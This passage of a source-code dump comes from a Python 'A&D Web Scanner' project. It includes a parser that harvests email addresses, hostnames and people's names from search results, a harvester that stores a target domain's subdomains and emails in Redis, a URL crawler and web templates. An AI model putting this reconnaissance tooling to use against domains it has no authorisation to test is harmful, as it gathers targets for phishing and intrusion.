558 |         self.message = "If you customize the allowed elements, you must define both types 'onetags' and 'twotags'."
559 | 
560 | if __name__ == '__main__':
561 |     print __doc__
562 | 


--------------------------------------------------------------------------------
/tHar_lib/myparser.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | 
  3 | 
  4 | class parser:
  5 | 
  6 |     def __init__(self, results, word):
  7 |         self.results = results
  8 |         self.word = word
  9 |         self.temp = []
 10 | 
 11 |     def genericClean(self):
 12 |         self.results = re.sub('<em>', '', self.results)
 13 |         self.results = re.sub('<b>', '', self.results)
 14 |         self.results = re.sub('</b>', '', self.results)
 15 |         self.results = re.sub('</em>', '', self.results)
 16 |         self.results = re.sub('%2f', ' ', self.results)
 17 |         self.results = re.sub('%3a', ' ', self.results)
 18 |         self.results = re.sub('<strong>', '', self.results)
 19 |         self.results = re.sub('</strong>', '', self.results)
 20 |         self.results = re.sub('<wbr>','',self.results)
 21 |         self.results = re.sub('</wbr>','',self.results)
 22 | 
 23 |         for e in ('>', ':', '=', '<', '/', '\\', ';', '&', '%3A', '%3D', '%3C'):
 24 |             self.results = self.results.replace(e, ' ')
 25 | 
 26 |     def urlClean(self):
 27 |         self.results = re.sub('<em>', '', self.results)
 28 |         self.results = re.sub('</em>', '', self.results)
 29 |         self.results = re.sub('%2f', ' ', self.results)
 30 |         self.results = re.sub('%3a', ' ', self.results)
 31 | 
 32 |         for e in ('<', '>', ':', '=', ';', '&', '%3A', '%3D', '%3C'):
 33 |             self.results = self.results.replace(e, ' ')
 34 | 
 35 |     def emails(self):
 36 |         self.genericClean()
 37 |         reg_emails = re.compile(
 38 |             # Local part is required, charset is flexible
 39 |            # https://tools.ietf.org/html/rfc6531 (removed * and () as they provide FP mostly )
 40 |             '[a-zA-Z0-9.\-_+#~!$&\',;=:]+' +
 41 |             '@' +
 42 |             '[a-zA-Z0-9.-]*' +
 43 |             self.word)
 44 |         self.temp = reg_emails.findall(self.results)
 45 |         emails = self.unique()
 46 |         return emails
 47 | 
 48 |     def fileurls(self, file):
 49 |         urls = []
 50 |         reg_urls = re.compile('<a href="(.*?)"')
 51 |         self.temp = reg_urls.findall(self.results)
 52 |         allurls = self.unique()
 53 |         for x in allurls:
 54 |             if x.count('webcache') or x.count('google.com') or x.count('search?hl'):
 55 |                 pass
 56 |             else:
 57 |                 urls.append(x)
 58 |         return urls
 59 | 
 60 |  
 61 | 
 62 | 
 63 | 
 64 | 
 65 |     def profiles(self):
 66 |         reg_people = re.compile('">[a-zA-Z0-9._ -]* - <em>Google Profile</em>')
 67 |         self.temp = reg_people.findall(self.results)
 68 |         resul = []
 69 |         for x in self.temp:
 70 |             y = string.replace(x, ' <em>Google Profile</em>', '')
 71 |             y = string.replace(y, '-', '')
 72 |             y = string.replace(y, '">', '')
 73 |             if y != " ":
 74 |                 resul.append(y)
 75 |         return resul
 76 | 
 77 |     def people_jigsaw(self):
 78 |         res = []
 79 |         #reg_people = re.compile("'tblrow' title='[a-zA-Z0-9.-]*'><span class='nowrap'/>")
 80 |         reg_people = re.compile(
 81 |             "href=javascript:showContact\('[0-9]*'\)>[a-zA-Z0-9., ]*</a></span>")
 82 |         self.temp = reg_people.findall(self.results)
 83 |         for x in self.temp:
 84 |             a = x.split('>')[1].replace("</a", "")
 85 |             res.append(a)
 86 |         return res
 87 | 
 88 |     def hostnames(self):
 89 |         self.genericClean()
 90 |         reg_hosts = re.compile('[a-zA-Z0-9.-]*\.' + self.word)
 91 |         self.temp = reg_hosts.findall(self.results)
 92 |         hostnames = self.unique()
 93 |         return hostnames
 94 | 
 95 |     def set(self):
 96 |         reg_sets = re.compile('>[a-zA-Z0-9]*</a></font>')
 97 |         self.temp = reg_sets.findall(self.results)
 98 |         sets = []
 99 |         for x in self.temp:
100 |             y = string.replace(x, '>', '')
101 |             y = string.replace(y, '</a</font', '')
102 |             sets.append(y)
103 |         return sets
104 | 
105 |     def hostnames_all(self):
106 |         reg_hosts = re.compile('<cite>(.*?)</cite>')
107 |         temp = reg_hosts.findall(self.results)
108 |         for x in temp:
109 |             if x.count(':'):
110 |                 res = x.split(':')[1].split('/')[2]
111 |             else:
112 |                 res = x.split("/")[0]
113 |             self.temp.append(res)
114 |         hostnames = self.unique()
115 |         return hostnames
116 | 
117 |     def unique(self):
118 |         self.new = []
119 |         for x in self.temp:
120 |             if x not in self.new:
121 |                 self.new.append(x)
122 |         return self.new
123 | 


--------------------------------------------------------------------------------
/tHar_lib/port_scanner.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/tHar_lib/port_scanner.py


--------------------------------------------------------------------------------
/templates/AD.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | <title>A&D Web Scanner</title>
 5 | <link href="static/css/bootstrap.css" rel="stylesheet" type="text/css" media="all" />
 6 | <script src="static/js/jquery.min.js"></script>
 7 | <link href="static/css/style.css" rel="stylesheet" type="text/css" media="all" />	
 8 | <meta name="viewport" content="width=device-width, initial-scale=1">
 9 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
10 | <meta property="og:title" content="Vide" />
11 | <meta name="viewport" content="width=device-width, initial-scale=1">
12 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
13 | <script src="static/js/bootstrap.min.js"></script>
14 | </head>
15 | <body class="banner-section">
16 | 		<div class="container">
17 | 			<div class="banner-heder">
18 | 				<h3>A&D Web Scanner<span>To Find What You Need</span></h3>
19 | 			</div>
20 | 			<div class="banner-grids">
21 | 				<div class="col-md-12 search" id="box">
22 | 					<form action="#" method="post" name="test">
23 | 						<div class="col-md-9">
24 | 							<input class="sel" type="text" placeholder="Please Input The URL" name="URL">
25 | 
26 | 						</div>
27 | 						<div class="col-md-3">
28 | 								<button type="submit" value="Search" id="Search" style="font-size: 20px;">Search</button>
29 | 						</div>
30 | 						<script>
31 |         					$(window).load(function() {
32 |         						document.getElementById("Search").style.height=$('#box').height()+"px";
33 |         						window.onresize=function(){
34 | 								console.log(window.innerHeight);
35 | 								document.getElementById("Search").style.height=$('#box').height()+"px";
36 | 								}
37 |         					});			
38 |     					</script>
39 | 					</form>
40 | 				</div>
41 | 				<div class="clearfix">
42 | 				</div>
43 | 			</div>
44 | 		</div>
45 | </body>
46 | </html>


--------------------------------------------------------------------------------
/templates/content.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | <title>A&D Web Scanner</title>
 5 | <link href="static/css/bootstrap.css" rel="stylesheet" type="text/css" media="all" />
 6 | <script src="static/js/jquery.min.js"></script>
 7 | <link href="static/css/style.css" rel="stylesheet" type="text/css" media="all" />	
 8 | <meta name="viewport" content="width=device-width, initial-scale=1">
 9 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
10 | <meta property="og:title" content="Vide" />
11 | <meta name="viewport" content="width=device-width, initial-scale=1">
12 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
13 | <script src="static/js/bootstrap.min.js"></script>
14 | </head>
15 | <body class="banner-section">
16 | 	<div class="col-md-8 search banner-header">
17 | 		<form action="#" method="post">
18 | 			<div class="col-md-6 box" id="box">
19 | 				<input class="sel" type="text" placeholder="Please Input The URL" name="URL">
20 | 			</div>
21 | 			<div class="col-md-2">
22 | 				<button type="submit" value="Search" id="Search" style="font-size: 18px;">Search</button>
23 | 			</div>
24 | 		</form>
25 | 	</div>
26 | 	<div class="clearfix">
27 | 	</div>
28 | 	<div class="content">
29 | 		<ul class="nav nav-tabs">
30 |   			<li class="li active" name="1"><a href="#">输出信息</a></li>
31 | 		</ul>
32 | 		<div class="box">
33 | 		<textarea class="textarea" contenteditable="true" readonly="true" name="1">{{result}}</textarea>
34 | 		</div>
35 | 	</div>
36 |     <script>
37 |         $('.li').click(function(){
38 |             $(this).addClass('active').siblings().removeClass('active');
39 |             var target = $(this).attr('name');
40 |             $('.box').children("[name='"+ target+"']").removeClass('hide').siblings().addClass('hide');
41 | 		});
42 |         $(window).load(function() {
43 | 			document.getElementById("Search").style.height=$('#box').height()+"px";
44 | 			function changeHeight() {	
45 | 				$('.content').height(window.innerHeight*0.82);
46 | 				$('.textarea').height(window.innerHeight*0.76);
47 | 			}
48 | 			changeHeight();
49 | 			window.onresize=function(){
50 | 				console.log(window.innerHeight);
51 | 				changeHeight();
52 | 				document.getElementById("Search").style.height=$('#box').height()+"px";
53 | 			}
54 | 		});
55 |     </script>
56 | </body>
57 | </html>


--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
 1 | import redis
 2 | 
 3 | save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)#开启本地radis
 4 | test1 = redis.Redis(connection_pool=save_pool)#创建一个连接实例
 5 | 
 6 | data = 'aa'
 7 | test1.sadd('data',data)
 8 | data = 'bb'
 9 | test1.sadd('data',data)
10 | 
11 | data = ['dd','ff']
12 | test1.sadd('data',data)
13 | for x in test1.smembers('data'):
14 |     print(type(x),x)
15 | 


--------------------------------------------------------------------------------
/the_harvest.py:
--------------------------------------------------------------------------------
 1 | from tHar_lib.engine_search import Search
 2 | from tHar_lib import hostchecker
 3 | import redis
 4 | import tldextract
 5 | 
 6 | class TheHarvester():
 7 |     def __init__(self, url, savepool, limit=200, engine='baidu'):
 8 |         val = tldextract.extract(url)
 9 |         self.word = "{0}.{1}".format(val.domain, val.suffix)
10 |         self.limit = limit
11 |         self.engine = engine
12 |         self.savepool = savepool
13 |         self.finished = False
14 |         self.redis_connect()
15 | 
16 | 
17 |     def is_finished(self):
18 |         return self.finished
19 | 
20 |     def redis_connect(self):
21 |         self.harvest_redis = redis.Redis(connection_pool=self.savepool)
22 | 
23 | 
24 |     def start_search(self):
25 |         search = Search(self.word, self.limit, self.engine)
26 |         search.process()
27 |         self.all_emails = search.get_emails()
28 |         self.all_hosts = search.get_hostnames()
29 |         self.host_check()
30 |         for i in self.all_hosts:
31 |             self.harvest_redis.sadd('Harvest_subdomain', i)
32 |         for i in self.all_emails:
33 |             self.harvest_redis.sadd('Harvest_emails', i)
34 |         self.finished = True
35 | 
36 | 
37 |         # print(self.all_hosts, self.all_emails)
38 | 
39 |     def host_check(self):
40 |         self.total_length = len(self.all_hosts)
41 |         self.all_hosts = sorted(set(self.all_hosts))
42 |         self.hosts = hostchecker.Checker(self.all_hosts).check()
43 |         
44 |     def run(self):
45 |         self.action = self.harvest_redis.hget('base','harvest_args')
46 |         if self.action == 'search':
47 |             self.start_search()
48 | 
49 | 
50 | if __name__ == '__main__':
51 |     save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)
52 |     Harvester = TheHarvester('baidu.com',savepool=save_pool)
53 | 
54 |     Harvester.start_search()
55 | 


--------------------------------------------------------------------------------
/url_spider.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import threading
  3 | from bs4 import BeautifulSoup
  4 | from urllib.parse import urljoin, urlparse
  5 | import time
  6 | import redis
  7 | 
  8 | 
  9 | def turn_num(url, length):
 10 |     '''
 11 |     转化为特征向量
 12 |     :param url: url
 13 |     :param length: 域名和协议的长度，我们只需要后面的部分，前面的部分每个url都一样，节省计算
 14 |     :return: url的特征向量
 15 |     '''
 16 |     url = url[length:]
 17 |     dim = 75
 18 | 
 19 |     char_index = [i for i in range(len(url)) if url[i] == '/']
 20 |     char_index.insert(0, 0)
 21 | 
 22 |     char_weight = []
 23 |     for i in range(len(char_index)):
 24 |         try:
 25 |             char_weight.append(url[char_index[i]:char_index[i + 1]])
 26 |         except:
 27 |             char_weight.append(url[char_index[i]:])
 28 | 
 29 |     num = len(char_weight)
 30 | 
 31 |     url_weight = [ord(j)*(num-i)*(num-i) for i in range(len(char_weight)) for j in char_weight[i]]
 32 | 
 33 |     for i in range(len(url_weight), dim):
 34 |         url_weight.append(0)
 35 |     return url_weight
 36 | 
 37 | 
 38 | def cos(vector1,vector2):
 39 |     '''
 40 |     余弦相似度计算
 41 |     :param vector1: url1
 42 |     :param vector2: url2
 43 |     :return: 相似度大小
 44 |     '''
 45 |     dot_product = 0.0
 46 |     normA = 0.0
 47 |     normB = 0.0
 48 |     for a,b in zip(vector1,vector2):
 49 |         dot_product += a*b
 50 |         normA += a**2
 51 |         normB += b**2
 52 |     if normA == 0.0 or normB == 0.0:
 53 |         return None
 54 |     else:
 55 |         return dot_product / ((normA*normB)**0.5)
 56 | 
 57 | 
 58 | def similarities(data, url, length):
 59 |     '''
 60 |     将url与一组url比较相似度
 61 |     :param data: 数据集
 62 |     :param url: 目标url
 63 |     :param length: 长度
 64 |     :return: 判定结果
 65 |     '''
 66 |     url_list = [turn_num(i, length) for i in data]
 67 |     target_url = turn_num(url, length)
 68 |     for i in url_list:
 69 |         try:
 70 |             if cos(target_url, i) > 0.9995:
 71 |                 return 1
 72 |         except:
 73 |             return 0
 74 |     return 0
 75 | 
 76 | 
 77 | class Downloader:   # 发起请求，获取内容
 78 |     def get(self, url, content):
 79 |         try:
 80 |             r = requests.get(url, timeout=100)
 81 |             if r.status_code != 200:
 82 |                 return None
 83 |             content.append(r.text)
 84 |             return content
 85 |         except:
 86 |             pass
 87 | 
 88 | 
 89 | class UrlManager: 
 90 |     def __init__(self):
 91 |         self.new_urls = set()
 92 |         self.old_urls = set()
 93 | 
 94 |     def add_new_url(self, url, length):
 95 |         if url is None or similarities(self.old_urls, url, length):  # 判断爬过的url中有没有相似的url，如果有就跳过
 96 |             return
 97 |         if url not in self.new_urls and url not in self.old_urls:
 98 |             self.new_urls.add(url)
 99 | 
100 |     def add_new_urls(self,urls, length):
101 |         if urls is None or len(urls) == 0:
102 |             return
103 |         for url in urls:
104 |              self.add_new_url(url, length)
105 | 
106 |     def has_new_url(self):
107 |         return len(self.new_urls) != 0
108 | 
109 |     def get_new_url(self, redis_add):
110 |          new_url = self.new_urls.pop()
111 |          redis_add(new_url)
112 |          self.old_urls.add(new_url)
113 |          return new_url
114 | 
115 | 
116 | class SpiderMain:
117 |     def __init__(self, root, savepool):
118 |         self.urls = UrlManager()
119 |         self.down = Downloader()
120 |         self.root = root
121 |         self.domain = urlparse(root).hostname
122 |         self.rootlength = len(self.root)
123 |         self.savepool = savepool
124 |         self.redis_connect()
125 |         self.finished = False
126 |         self.spider_redis.set('spider_redis', 'False')
127 | 
128 |     def run(self):
129 |         self.redis_get()
130 |         if self.action == 'craw':
131 |             self.craw()
132 |         self.finished = True
133 |         self.spider_redis.set('spider_redis', 'True')
134 | 
135 |     def is_finished(self):
136 |         return self.finished
137 | 
138 |     def redis_get(self):
139 |         self.action = self.spider_redis.hget('base', 'spider_args')
140 |         self.threadnum = self.spider_redis.hget('base', 'spider_threads')
141 | 
142 |     def redis_set(self, url):
143 |         #print('spider add!')
144 |         try:
145 |             self.spider_redis.sadd('Spider_full_urls', url)
146 |         except Exception as e:
147 |             print(e)
148 | 
149 |     def redis_connect(self):
150 |         #save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)
151 |         self.spider_redis = redis.Redis(connection_pool=self.savepool)
152 | 
153 |     def judge(self, domain, url):  # 判断链接的域名
154 |         if(url.find(domain) != -1):
155 |             return True
156 |         else:
157 |             return  False
158 | 
159 |     def parse(self, page_url, content):  # 解析页面
160 |         if content is None:
161 |             return
162 |         soup = BeautifulSoup(content, 'lxml')
163 |         news = self.get_new_urls(page_url, soup)
164 |         return news
165 | 
166 |     def get_new_urls(self, page_url, soup):  # 从页面里面获得a标签列表，并组成新地址
167 |         new_urls = set()
168 |         links = soup.find_all('a')
169 |         for link in links:
170 |             new_url = link.get('href')
171 |             new_full_url = urljoin(page_url, new_url)
172 |             if self.judge(self.domain, new_full_url):
173 |                 new_urls.add(new_full_url)
174 |         return new_urls
175 | 
176 |     def craw(self):    # 控制流程，利用多线程发起请求
177 |         self.urls.add_new_url(self.root, self.rootlength)
178 |         while self.urls.has_new_url():
179 |             content = []
180 |             th = []
181 |             for _ in list(range(int(self.threadnum))):
182 |                 if self.urls.has_new_url() is False:
183 |                     break
184 |                 new_url = self.urls.get_new_url(self.redis_set)
185 | 
186 |                 # print("craw: " + new_url)
187 |                 t = threading.Thread(target=self.down.get, args=(new_url, content))
188 |                 t.start()
189 |                 th.append(t)
190 |             for t in th:
191 |                 t.join()
192 |                 
193 |             for _str in content:
194 |                 if _str is None:
195 |                     continue
196 | 
197 |                 new_urls = self.parse(new_url, _str)
198 |                 self.urls.add_new_urls(new_urls, self.rootlength)
199 | 
200 |     def all(self):
201 |         print('[+] ALL ' + str(len(self.urls.old_urls)))
202 | 
203 |     def check(self):
204 |         reponse = requests.get(self.root)
205 |         if reponse == 200:
206 |             if len(self.urls.old_urls) > 1:
207 |                 #print('the status of spider [success]')
208 |                 return 1
209 |             else:
210 |                 #print('the status of spider [fail]')
211 |                 return 0
212 |         else:
213 |             #print('target url error')
214 |             return 0
215 | 
216 | 
217 | 
218 | if __name__ == '__main__':
219 |     url = 'http://www.leslie2018.com'
220 |     save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)
221 |     spider = SpiderMain(url, save_pool)
222 |     spider.run()
223 |     print('[+]  All ' + str(len(spider.urls.old_urls)))
224 | 


--------------------------------------------------------------------------------